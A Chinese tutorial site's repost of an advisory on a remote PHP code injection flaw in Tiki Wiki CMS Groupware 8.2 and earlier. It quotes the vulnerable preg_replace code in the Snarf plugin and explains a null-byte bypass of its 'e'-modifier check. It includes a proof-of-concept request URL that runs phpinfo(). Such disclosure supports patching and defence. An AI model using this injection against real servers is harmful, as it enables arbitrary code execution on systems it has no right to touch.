网站地图    收藏   

主页 > 后端 > 网站安全 >

Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php)远程php代码

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] -------------------------------------------------------------------------Tiki Wiki CMS Groupware = 8.2 (snarf_ajax.php) Remote PHP Code Injection----------------------------------------......

 

------------------------------------------------------------------------- 

 

Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection 

 

------------------------------------------------------------------------- 

作者: Egidio Romano aka EgiX  www.2cto.com n0b0d13s[at]gmail[dot]com 

 

软件地址: http://info.tiki.org/ 

[-]缺陷解释: 

 

 问题代码位置/lib/wiki-plugins/wikiplugin_snarf.php: 

 

  

 

170.   // If the user specified a more specialized regex 

 

171.   if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) { 

 

172.      $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf ); 

 

173.   } 

 

  

 

input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent 

 

execution of arbitrary PHP code using the  'e'  modifier in a call to preg_replace() at line 172. 

 

But  this  check  could  be  bypassed  with a  null byte injection,  requesting an URL like this: 

 

  

 

 http://www.2cto.com /tiki-8.2/snarf_ajax.php?url=1&regexres=phpinfo()&regex=//e%00/ 

 

  

 

Tiki internal filters remove  all null bytes  from user input,  but for some strange reason  this 

 

doesn't  happen within admin sessions. So, successful exploitation of this vulnerability requires 

 

an user account with  administration  rights and  'PluginSnarf'  to be enabled  (not by default). 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论